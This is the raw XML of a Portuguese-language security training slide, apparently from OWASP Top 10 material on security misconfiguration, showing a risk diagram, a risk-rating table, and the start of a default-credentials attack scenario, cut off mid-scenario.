              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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39" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="34" idx="3"/>
                <a:endCxn id="37" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="37" idx="4"/>
                <a:endCxn id="42" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="30" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8523920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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795473473"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948521"/>
          <a:ext cx="6858000" cy="2612559"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="575479">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gridSpan="2">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>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r>
              <a:tr h="4572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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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451035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Considere atacantes externos anônimos, bem como usuários com suas próprias contas que podem tentar comprometer o sistema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Considere também alguém internamente querendo disfarçar suas ações.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Atacante acessa contas padrão, páginas não utilizadas, falhas não corrigidas, arquivos e diretórios desprotegidos, etc, para obter acesso não autorizado ou conhecimento do sistema.</a:t>
                      </a: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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Configurações incorretas podem acontecer em qualquer nível da pilha da</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> aplicação, incluindo a plataforma, servidor web, servidor de aplicação, banco de dados, framework e código personalizado</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Desenvolvedores e administradores de sistemas precisam trabalhar juntos para garantir que toda a pilha esteja</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>configurada corretamente. Scanners automatizados são úteis para detectar falta de atualizações, erros de configuração, uso de contas padrão, serviços desnecessários, etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Tais falhas frequen-temente permitem aos atacantes acesso não autorizado a alguns dados ou funcionalidade do sistema. Ocasionalmente, resultam no comprometimento</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> completo do sistema</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>O sistema poderia ser completamente comprometido sem você saber. Todos os seus dados podem ser roubados ou modificados lentamente ao longo do tempo. Custos de recuperação podem ser caros.</a:t>
                      </a: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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6477000"/>
            <a:ext cx="3383280" cy="26670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pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>O console de administração do servidor de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>é instalado automaticamente e não é removido. Contas padrão não são alteradas. Atacantes descobrem as páginas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>padrão de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>administração </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>estão em seu servidor, fazem login com senhas padrão e assumem o acesso do ambiente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
